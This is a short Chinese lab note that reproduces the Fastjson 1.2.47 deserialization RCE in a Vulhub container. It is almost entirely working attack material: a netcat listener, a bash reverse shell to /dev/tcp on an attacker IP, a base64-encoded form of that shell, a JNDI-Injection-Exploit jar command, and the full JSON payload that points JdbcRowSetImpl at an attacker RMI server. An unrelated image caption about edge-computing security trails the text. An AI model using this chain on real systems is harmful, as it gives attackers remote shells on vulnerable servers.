vulhub:
找到fastjson1.2.47rce
docker-compose up -d
nc -lvp 9443
attacker
反彈shell
bash -i >& /dev/tcp/192.168.211.129/9443 0>&1
加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}
最後的ip是apache伺服器的,172.26.39.196啟動apache指令
/usr/local/apache-tomcat-8.5.69/webapps/ROOT# ./startup.sh
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}" -A "172.26.39.196"
起監聽
post:
Content-Type:application/json
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://172.26.39.196:1099/mmwktn”,
“autoCommit”:true
}
}
其中dataSourceName是JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar産生的jdk1.8的rmi位址
![“雲管邊端”協同的邊緣計算安全防護解決方案0 引 言1 5G 及邊緣計算2 邊緣計算面臨的風險3 “雲管邊端”安全防護技術4 “雲管邊端”安全防護實踐5 結 語[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)